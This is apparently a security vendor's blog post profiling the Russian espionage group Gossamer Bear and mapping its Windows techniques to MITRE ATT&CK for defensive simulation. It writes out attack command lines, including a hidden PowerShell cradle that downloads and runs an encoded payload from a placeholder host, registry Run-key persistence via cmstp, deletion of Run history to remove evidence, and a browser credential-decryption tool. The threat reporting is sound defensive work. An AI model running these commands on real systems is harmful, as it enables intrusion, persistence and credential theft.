Gossamer Bear (also tracked as Callisto, Blue Charlie, Star Blizzard, COLDRIVER, and TA446) is a Russian state-sponsored threat group associated with the FSB’s 18th Center. Active since at least 2016, it conducts cyber-espionage campaigns targeting government, defense, academic, and policy organizations across NATO member states, the US, and Ukraine.
Gossamer Bear is best known for highly tailored spear-phishing operations that harvest credentials through fake login portals and malicious domains. The group maintains long-term access for intelligence collection and occasionally conducts hack-and-leak operations to influence public narratives. Its activities demonstrate a strong alignment with Russian geopolitical interests, making it a persistent and sophisticated adversary focused on strategic espionage rather than financial gain.
In this blog, we are going to examine the Goosamer Bear’s Windows endpoint campaign, mapped to MITRE ATT&CK framework.
Goal: Gossamer Bear loads a malicious DLL with rundll32.exe to run code while blending with a trusted OS binary.
Method: Drop the DLL to a writable folder (e.g., %TMP%) and invoke it with rundll32, calling a specific exported function to execute the payload.
How it hides
• Runs under a signed Windows binary, avoiding simple allowlists.
• No obvious EXE on disk — logic executes inside the DLL.
• Can be concealed by a proxy parent (e.g., winver.exe), muddying process lineage.
Picus SCV runs the same sequence to validate whether endpoint controls and telemetry detect DLL injection via rundll32 and whether parent-child process chains are visible to defenders.
|
#Process 1 rundll32.exe "%TMP%\vmtools.dll",fjdpw03d {predefined-process-list} winver.exe |
Payload explanation
The sequence mimics dropping a DLL to a writable location and executing it via a trusted system binary to test detection of proxy execution and fileless DLL techniques.
Goal: Gossamer Bear uses BITS jobs to quietly download and stage payloads via a trusted Windows utility.
Method: Create a BITS job, copy/rename bitsadmin.exe into %TMP%, and stage files there for later execution.
Why it works for the attacker
The Picus SCV module runs the same sequence to validate whether endpoint controls, monitoring, and detection rules catch registry, file and process activity associated with BITS job abuse. This verifies if security controls flag renamed LOTL binaries, unusual copies to %TMP%, or BITS job creation and execution.
|
#Process 1 #Process 2 |
Payload explanation
The sequence mimics an attacker using a signed, living off the land binary to perform resilient downloads and to stage or execute payloads while minimizing noisy telemetry and file artifacts.
Goal: Gossamer Bear targets the RunMRU registry key to erase entries from the Windows Run dialog history (Win+R), removing a key source of forensic evidence about commands that were executed.
Method: The actor uses the native reg.exe utility to manipulate registry entries. By first ensuring the key exists and then force-deleting it, the adversary quickly removes command-history artifacts that investigators rely on to reconstruct activity.
How it hides
• Uses a trusted, signed system binary (reg.exe), blending with normal admin activity.
• Operates at the registry level, leaving no file artifacts and minimizing noisy telemetry.
The Picus SCV module runs the same sequence to validate detection and response coverage for registry-based evidence removal. It demonstrates how an attacker can erase Run history and verifies whether logging/alerting catches the behavior.
|
#Process 1 #Process 2 |
Payload explanation
The sequence mimics rapid, trusted-binary cleanup of command-history evidence, testing whether endpoint and SIEM controls detect or retain sufficient telemetry for post-incident investigation.
Goal: Gossamer Bear issues a single obfuscated command that downloads an encoded PowerShell payload from a remote host and runs it directly in memory to evade signature-based detection.
Method: The actor abuses PowerShell as a living-off-the-land tool to fetch and execute code without ever writing the final payload to disk, achieving a fileless execution path.
How it hides: The payload is delivered as a Base64-encoded string and executed with flags that suppress any visible window, minimizing artifacts and user visibility.
|
powershell.exe -NoP -sta -NonI -W hidden -c "$e=(New-Object System.Net.webClient).downloadString('%remotefile-66%');powershell -enc $e" |
Payload explanation
This safely mimics Gossamer Bear performing multi-stage, fileless code execution where the malicious logic is obscured by both network delivery and Base64 encoding.
Goal: Gossamer Bear uses PowerShell’s built-in web request feature to contact a remote server and download external content or payloads directly into memory.
Method: Leverage Invoke-WebRequest to fetch remote files or scripts over HTTP(S) using native PowerShell functionality, eliminating the need for external utilities.
How it hides
Picus SCV runs the same PowerShell command to confirm whether endpoint and network controls detect outbound connections and remote file retrievals initiated via PowerShell.
|
powershell.exe -c "Invoke-WebRequest -Uri %remotefile-11085%" |
Payload explanation
Goal: Gossamer Bear drops and runs a script that registers a new scheduled task to achieve persistence.
Method: Place a script in a writable location (e.g., %TMP%) and execute it with PowerShell; the script uses the TaskScheduler COM API to create a task that runs on a schedule or at logon.
How it hides
Picus SCV executes the same script-and-register pattern to verify whether endpoint controls, scheduled-task monitoring, and change-logging detect the new task.
|
powershell.exe -c "%TMP%\scheduledTask.ps1" |
Payload explanation
Goal: Gossamer Bear adds a registry Run key so a payload launches automatically at boot or user logon.
Method: Write an autorun entry to the HKLM Run hive that points to a signed or trusted binary invoked with a crafted argument to execute attacker-controlled code.
How it hides
Picus SCV writes the same Run-key entry to validate detection of registry persistence and whether execution via a trusted helper binary is captured by endpoint and SIEM controls.
|
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SystemHealthCheck /d "cmstp.exe /s c:\programdata\DefenderService.inf" /f |
Payload explanation
Goal: Gossamer Bear identifies which browsers are installed to target browser-specific TTPs (extensions, profiles, or credential theft).
Method: Query browser-related registry keys (or run a small enumerator) to list installed browsers and versions.
|
%TMP%\GetBrowserList.exe |
Payload explanation
Goal: Gossamer Bear harvests browser bookmarks and profile data to locate saved URLs, SSO flows, and high-value targets for credential/session collection.
Method: Relax local PowerShell execution policy, import a collection module from %TMP%, and extract bookmark/profile artifacts for the targeted browser.
Picus SCV runs the same PowerShell sequence to verify whether script execution, module imports, and filesystem/registry reads used for browser data collection are detected and logged.
|
#Process 1 |
Payload explanation
This mimics Gossamer Bear harvesting browser artifacts for reconnaissance and credential/session harvesting, testing detection of scripted collection and local data access.
Goal: Gossamer Bear searches the filesystem for documents and office files to locate sensitive data for exfiltration or privilege escalation.
Method: Run a recursive file search for common document extensions across drives to build an inventory of candidate files.
Picus SCV executes the same search to validate whether endpoint and file-monitoring controls detect broad recursive enumeration and suspicious mass-file queries.
|
cmd.exe /c for %G in (.pdf, .doc, .wps, .docx, .ppt, .xls, .xlsx, .pptx, .rtf) do forfiles /p "C:" /s /M *%G /C "cmd /c echo @PATH" |
Payload explanation
The sequence mimics Gossamer Bear performing wide-scale file discovery to identify exfiltration targets or files useful for lateral movement, testing whether file-access monitoring and DLP telemetry surface mass enumeration.
Goal: Gossamer Bear enumerates domain user accounts to map targets and identify high-value principals.
Method: Use the native net utility to request a list of domain accounts from a joined host or domain controller.
|
net.exe user /domain |
Payload explanation
This mimics attacker reconnaissance to discover valid accounts for lateral movement, privilege escalation, or targeted credential attacks, testing detection of domain-level enumeration.
Goal: Gossamer Bear captures a machine’s inventory (OS build, patch levels, hotfixes, network adapters, domain membership) to profile hosts and select follow-on TTPs.
Method: Run the native systeminfo.exe utility to dump comprehensive system configuration and patch/role details.
Picus SCV executes the same command to verify whether endpoint telemetry, asset inventory systems, and SIEM ingest this output for detection and context enrichment.
|
systeminfo.exe |
Payload explanation
This gives an attacker the environment context needed for exploit selection and lateral movement, and tests whether such profiling is captured and correlated by defenders.
Goal: Gossamer Bear collects detailed network configuration to map interfaces, IPs, gateways, DNS servers, and routing info useful for lateral movement and reconnaissance.
Method: Run the native ipconfig utility to dump the host’s complete TCP/IP settings.
Picus SCV runs the same command to verify whether endpoint and network telemetry capture network-inventory queries and surface them for detection or correlation.
|
ipconfig.exe /all |
Payload explanation
This output gives an attacker the network topology and routing details needed to plan lateral movement, pivoting, or identify exposed services, and tests whether such enumeration is logged and flagged by defenders.
Goal: Gossamer Bear enumerates active network connections and associated PIDs to identify remote hosts, listening services, and potential command-and-control channels.
Method: Run netstat to list all TCP/UDP sockets, their states, remote endpoints, and owning process IDs.
Picus SCV runs the same command to verify whether network-connection enumeration is captured by endpoint and network telemetry and correlated with process context.
|
netstat -nao |
Payload explanation
This gives an attacker a map of current network activity and which processes own sockets, aiding identification of C2, lateral pivots, or exposed services, and tests whether defenders link connections to processes for detection.
Goal: Gossamer Bear collects account and privilege information to find high-privilege contexts and usable credentials.
Method: Invoke whoami to return current user, group membership, and privilege/token details.
Picus SCV runs the same command to confirm whether account/context enumeration is logged and whether telemetry exposes privilege-escalation opportunities.
|
whoami.exe /all |
Payload explanation
This reveals whether the process runs with elevated rights or membership in sensitive groups, helping attackers choose escalation or lateral-movement paths, and validates detection of privilege-context queries.
Goal: Gossamer Bear inventories running applications and services to identify interesting processes (AV, browsers, mail clients) and candidate parents for process-hiding or injection.
Method: Use tasklist to produce a verbose process list including PID, session, memory, and window title.
Picus SCV executes the same command to ensure process-enumeration telemetry is collected and that defenders can correlate process listings with suspicious activity.
|
tasklist.exe /v |
Payload explanation
This helps an attacker spot security products, user apps with credentials/sessions, or processes suitable for proxying or injection, and tests whether process-enumeration is visible to monitoring tools.
Goal: Gossamer Bear runs a local App-Bound Encryption (ABE) decryption utility to extract saved credentials from a browser (Edge/Chrome) profile.
Method: Execute a tool from a writable location that calls the browser’s encryption/decryption APIs or local key material to decrypt and dump stored logins, cookies, and session tokens.
How it hides
• Runs in the current user context (no elevation required), reducing telemetry noise.
• Uses native browser crypto/APIs and local profile files rather than brute-force methods.
• Executes from a benign-looking path (%TMP%), blending with normal user-launched tooling.
Picus SCV runs the same ABE decryption flow to validate whether endpoint, file-access, and process-monitoring controls detect local credential access, profile file reads, and suspicious decryption activity.
|
%TMP%\chrome_inject.exe -s edge |
Payload explanation
The sequence simulates an attacker harvesting browser-stored credentials to support lateral movement or account takeover and tests whether defenders log and alert on local credential-exfiltration behavior.
The Picus Security Validation Platform safely simulates Gossamer Bear Windows endpoint campaigns, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.
You can also test your defenses against hundreds of other malware variants, such as Salt Typhoon APT, APT28, Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.
|
Threat ID |
Threat Name |
Attack Module |
|
24801 |
Gossamer Bear Threat Group Campaign |
Windows Endpoint |
|
Tactic |
Key Takeaway (Single Line) |
|
Defense Evasion |
LotL Execution: The group uses the signed system binary Rundll32 to load and execute malicious DLLs, evading simple allowlists and blending with trusted processes. |
|
Defense Evasion |
Resilient Staging: Gossamer Bear abuses the Background Intelligent Transfer Service (BITS) Jobs to quietly download and stage payloads resiliently across reboots and network interruptions. |
|
Execution |
Fileless Execution: Attackers use Base64-encoded PowerShell commands to fetch and run subsequent payloads directly in memory, avoiding disk artifacts. |
|
Execution |
Proxy Process Launch: The threat actors obscure their execution by launching malicious processes under benign, legitimate parents like winver.exe to muddy process lineage. |
|
Persistence |
Scheduled Task: Persistence is established by creating a new Scheduled Task using the COM TaskScheduler API, which blends into normal system scheduling mechanisms. |
|
Persistence |
Registry Autorun: They leverage the Registry Run Keys (HKLM) to ensure payload execution at boot/logon, often chaining a trusted binary like cmstp.exe with a crafted argument. |
|
Discovery |
Host Profiling: Gossamer Bear collects comprehensive host data, including OS version, patch levels, and network adapters, using the systeminfo.exe utility. |
|
Discovery |
Network Mapping: The ipconfig /all and netstat -nao commands are used to map the host's network configuration and active TCP connections for lateral movement planning. |
|
Credential Access |
Browser Harvesting: The group targets installed browsers and runs local decryption tools to harvest saved credentials, cookies, and session tokens from browser profile data. |
|
Indicator Removal |
Forensic Cleanup: They use reg.exe to delete the RunMRU registry key, effectively erasing the Windows Run dialog command history to remove forensic evidence. |